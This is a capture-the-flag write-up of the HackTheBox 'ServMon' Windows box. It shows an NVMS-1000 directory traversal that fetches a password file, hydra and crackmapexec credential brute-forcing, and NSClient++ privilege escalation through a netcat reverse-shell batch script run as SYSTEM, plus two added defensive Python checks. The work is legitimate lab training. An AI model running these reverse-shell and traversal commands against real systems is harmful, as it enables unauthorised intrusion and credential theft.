HackTheBox - ServMon

ServMon just retired on HackTheBox; it's an easy-difficulty Windows box. This was my first ever Windows-based box, and it was quite new to me since I haven't used Windows for the last 7 years. Nonetheless it was a good opportunity to learn a few new tricks by getting out of my comfort zone.
Overall I quite enjoyed this box, which is, in my opinion, the perfect opportunity to start on Windows-based boxes.

Tl;Dr: To get the user flag you had to retrieve a text file containing credentials by using a file traversal vulnerability in a network surveillance application running on port 80. You then find a list of two users on an open FTP server. Using the credentials list found earlier, you can brute-force the password of one of the users (Nadine) and grab the flag.
To get the root flag you had to exploit multiple vulnerabilities in the NSClient++ monitoring daemon to achieve Remote Code Execution as root and read the flag.

Alright! Let’s get into the details now!


First things first, let's add the box IP to the hosts file (writing to /etc/hosts requires root, hence sudo tee):

[hg8@archbook ~]$ echo "10.10.10.184 servmon.htb" | sudo tee -a /etc/hosts

and let’s start!

User Flag

Recon

Let’s start with the classic nmap scan to see which ports are open on the box:

[hg8@archbook ~]$ nmap -sV -sT -sC -p- servmon.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 12:02 CEST
Nmap scan report for servmon.htb (10.10.10.184)
Host is up (0.027s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
8443/tcp open ssl/https-alt
|_ http-title: NSClient++

We have two web apps running on ports 80 and 8443, SMB on port 445, FTP on port 21, and finally SSH on port 22.

FTP anonymous login

nmap indicates that anonymous login is possible on the FTP server running on port 21. It also shows that there is a Users directory inside. Looks quite promising.

Let's take a look ourselves:

[hg8@archbook ~]$ ftp servmon.htb
Connected to servmon.htb.
220 Microsoft FTP Service
Name (servmon.htb:hg8): anonymous
331 Anonymous access allowed.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.
ftp> quit

Alright, since we have sufficient permissions, let's download the whole Users folder to browse its content more easily:

[hg8@archbook ~]$ wget -r ftp://anonymous:@servmon.htb/
[hg8@archbook ~]$ tree servmon.htb
servmon.htb
└── Users
    ├── Nadine
    │   └── Confidential.txt
    └── Nathan
        └── Notes to do.txt

[hg8@archbook ~]$ cat "servmon.htb/Users/Nathan/Notes to do.txt"
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint%

[hg8@archbook ~]$ cat servmon.htb/Users/Nadine/Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine%

That's interesting: according to Nadine there is a Passwords.txt file on Nathan's Desktop. Let's keep that in mind for later, it will probably come in useful.

Now that we are done with the FTP server, let's move on to port 80.

TVT NVMS 1000 - Directory Traversal

Opening http://servmon.htb displays the following login page:

[Screenshot: TVT NVMS login page]

That's an uncommon login page. A quick Google search on NVMS-1000 gives us the following information:

NVMS-1000 is a monitoring client which is specially designed for network video surveillance.

http://en.tvt.net.cn/products/188.html

As with any obscure software, let's check whether a public exploit is available.

[hg8@archbook ~]$ searchsploit "TVT NVMS 1000"
------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------ ----------------------------------------
TVT NVMS 1000 - Directory Traversal | exploits/hardware/webapps/48311.py
------------------------------------------------------------ ----------------------------------------
Shellcodes: No Results

That sounds perfect for what we need.

Given the information we got earlier, we can probably retrieve the Passwords.txt file Nadine was talking about using this Directory Traversal vulnerability.

Reading the exploit code shows that we have to go back 12 levels to get to the root path. Let's give it a try to retrieve the file located in /Users/Nathan/Desktop/ (according to Nadine's note):

[hg8@archbook ~]$ curl -i --path-as-is "http://servmon.htb/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt" 
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$%

We got a few passwords.
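
The request above only works because curl's --path-as-is stops the client from collapsing the ../ sequences, so the server has to canonicalise the path itself. The check below is an added example, not code from the original post or from NVMS; the web root C:\NVMS\www and the function names are assumptions, and it also covers percent-encoded and backslash variants of the same request.

```python
import ntpath
from urllib.parse import unquote

WEB_ROOT = r"C:\NVMS\www"  # hypothetical web root, not taken from the page

def resolve_request_path(raw_path, root=WEB_ROOT):
    """Return the canonical file path for a request, or None if it escapes root."""
    decoded = unquote(raw_path)                          # undo %2e%2e%2f style encoding
    relative = decoded.replace("/", "\\").lstrip("\\")   # Windows accepts both separators
    candidate = ntpath.normpath(ntpath.join(root, relative))
    root_norm = ntpath.normpath(root)
    cand_cmp, root_cmp = ntpath.normcase(candidate), ntpath.normcase(root_norm)
    # Require a separator after the root so C:\NVMS\www2 does not pass as "inside".
    if cand_cmp == root_cmp or cand_cmp.startswith(root_cmp + "\\"):
        return candidate
    return None

# Constructed request paths; the first is the one sent with curl above.
SAMPLE_REQUESTS = [
    "/" + "../" * 12 + "Users/Nathan/Desktop/Passwords.txt",
    "/%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt",
    "/..\\..\\Users\\Nathan\\Desktop\\Passwords.txt",
    "/css/../index.html",
    "/index.html",
]

def rejected_requests(requests=SAMPLE_REQUESTS):
    """Requests a server doing this check would refuse (and should log)."""
    return [r for r in requests if resolve_request_path(r) is None]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req!r:75} -> {resolve_request_path(req)}")
```

The comparison is done on the canonical path after decoding, so a harmless /css/../index.html still resolves while anything that lands outside the root is refused.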

Nadine account bruteforce

SSH brute force

Since SSH is open, maybe one of these passwords will work for the Nathan user. Let's use hydra to try brute-forcing it:

[hg8@archbook ~]$ hydra -l Nathan -P Passwords.txt 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7 login tries (l:1/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
1 of 1 target completed, 0 valid passwords found

No luck, but it may be worth trying on Nadine's account:

[hg8@archbook ~]$ hydra -l Nadine -P Passwords.txt 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7 login tries (l:1/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found

Alright, we got Nadine's account password: “LikeBigButts at Work”…? Well ok why not :P

SMB bruteforce

Since the SMB port 445 is open it was also possible to brute-force using this entry point. For this one I will use crackmapexec:

[hg8@archbook ~]$ crackmapexec smb 10.10.10.184 -u Nadine -p Passwords.txt
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] ServMon\Nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\Nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\Nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:L1k3B1gBut7s@W0rk

Once again we got Nadine's account credentials.

We can now connect to Nadine's account through SSH and grab the flag:

[hg8@archbook ~]$ ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
6xxxxxxxxxxxxxxxxxxxxxxxe

Root Flag

Recon

So far we didn't even need to look at what is running on port 8443. Since nothing is left to chance on HackTheBox, that's probably our entry point to root.

Opening http://servmon.htb:8443 displays the following page:

[Screenshot: NSClient++ web interface]

The web interface is really buggy and nothing can be done from there. I don’t know if it’s intended or not but anyway let’s move on.

Out of curiosity let’s check on searchsploit if any vulnerabilities are available for this NSClient++ tool:

[hg8@archbook ~]$ searchsploit nsclient
----------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | exploits/json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation | exploits/windows/local/46802.txt
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Results

Navigating to the NSClient++ folder lets us confirm that the running version is vulnerable:

PS C:\Program Files\NSClient++> .\nscp --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

We are going to skip the Authenticated Remote Code Execution since, well, we already have code execution on the machine as Nadine.
But the Privilege Escalation looks like exactly what we need to get to root. Let's take a look at it:

[hg8@archbook ~]$ cat /usr/share/exploitdb/exploits/windows/local/46802.txt
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.

The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.

Exploit:
1. Grab web administrator password
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

Sounds really good, we have the detailed exploit procedure. One problem remains: most of the configuration needed to set up the exploit requires access to the Web Interface. Unfortunately this interface is completely buggy and unstable (at least when I was working on it), so we need to find a way to access the same features without using the Web Interface.

After reading the documentation a little I am confident it should be possible to do so only using the API and the nscp client.
Alright let’s get into it!
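
The conditions the advisory chains together (a cleartext web password in the configuration file, CheckExternalScripts plus Scheduler enabled, and scripts accepted from any path) can be checked for in a configuration file. The audit below is an added example, not code from the original post or from NSClient++; the nsclient.ini section and key names are assumptions modelled on the settings paths quoted in the advisory, and audit_nsclient_ini is a hypothetical helper.

```python
import configparser
import ntpath

INSTALL_DIR = r"C:\Program Files\NSClient++"  # install path shown on the page

# Constructed sample. Section and key names are assumptions modelled on the
# settings paths quoted in the advisory; values reuse the advisory's examples.
SAMPLE_INI = r"""
[/settings/default]
password = SoSecret

[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/external scripts/scripts]
foobar = c:\temp\evil.bat
check_ok = scripts\check_ok.bat
"""

def audit_nsclient_ini(text, install_dir=INSTALL_DIR):
    """Return findings for the conditions the advisory chains together."""
    cfg = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cfg.optionxform = str  # keep key case as written
    cfg.read_string(text)
    findings = []
    if cfg.get("/settings/default", "password", fallback="").strip():
        findings.append("web password stored in cleartext")
    modules = dict(cfg.items("/modules")) if cfg.has_section("/modules") else {}
    on = {name.lower() for name, state in modules.items()
          if state.strip().lower() in ("enabled", "1", "true")}
    if {"checkexternalscripts", "scheduler"} <= on:
        findings.append("CheckExternalScripts and Scheduler are both enabled")
    section = "/settings/external scripts/scripts"
    root = ntpath.normcase(ntpath.normpath(install_dir)) + "\\"
    for alias, command in (cfg.items(section) if cfg.has_section(section) else []):
        if not command.strip():
            continue
        # First token only: quoted paths containing spaces are out of scope here.
        target = command.strip().strip('"').split()[0]
        full = ntpath.normcase(ntpath.normpath(ntpath.join(install_dir, target)))
        if not full.startswith(root):
            findings.append(f"script '{alias}' runs from outside the install dir: {target}")
    return findings
```

A file-content audit cannot see who is allowed to read the file, so the ACL on the configuration file still needs a separate check.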

NSClient++ Privilege Escalation

First we need to retrieve the admin account password. Let's use the nscp client to do so:

PS C:\Program Files\NSClient++> .\nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

Then let's activate the CheckExternalScripts module:

PS C:\Program Files\NSClient++> .\nscp settings --activate-module CheckExternalScripts
E schedule WE need wither duration or schedule: foobar[1936159329] = {tpl: {alias: foobar, path: /s
ettings/scheduler/schedules/foobar, is_tpl: false, parent: default, value: command = foobar, options
: { } }, command: command, channel: NSCA, source_id: , target_id: }

Now let’s download a Windows version of netcat and create our .bat reverse-shell script:

[hg8@archbook ~]$ wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
[hg8@archbook ~]$ cat hg8.bat
@echo off
C:\Temp\nc.exe 10.10.10.10 8585 -e cmd.exe

Using scp we can send nc.exe to the box's C:\Temp folder:

[hg8@archbook ~]$ scp nc.exe [email protected]:C:/Temp
[email protected]'s password:
nc.exe 100% 38KB 442.0KB/s 00:00

Let’s make sure it’s been sent correctly:

PS C:\Program Files\NSClient++> ls C:\Temp

Directory: C:\Temp

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 26/05/2020 13:46 38616 nc.exe

Alright, we have everything ready now. Let’s use NSClient++ to execute our reverse shell with elevated privileges. To do so we need to add an “External Script” and then tell NSClient++ to execute it.

Since the Web Interface is not accessible we need to use the API. Thankfully it’s almost fully documented.

The API is only accessible from localhost so I will open an SSH tunnel to make testing easier since I am more comfortable working with bash than PowerShell:

[hg8@archbook ~]$ ssh -L 4444:127.0.0.1:8443 [email protected]

Now we are all set up. Let's add our external script (the reverse shell) using the API:

[hg8@archbook ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:4444/api/v1/scripts/ext/scripts/hg8.bat --data-binary @hg8.bat
Added hg8 as scripts\hg8.bat%

We can verify our script has been added:

[hg8@archbook ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT https://localhost:4444/api/v1/scripts/ext
["hg8"]

Time to open our listener:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585

And use the API again to execute our script. The execute command was not so straightforward to find in the documentation, but digging a little we can find it under the queries endpoint:

[hg8@archbook ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:4444/api/v1/queries/hg8/commands/execute"

And on our listener a new connection opens: we have a shell as nt authority\system:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.184:49746
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++> whoami
nt authority\system

C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
0xxxxxxxxxxxxxxxxxxxxx5

That's it folks! As always, do not hesitate to contact me with any questions or feedback!

See you next time ;)

-hg8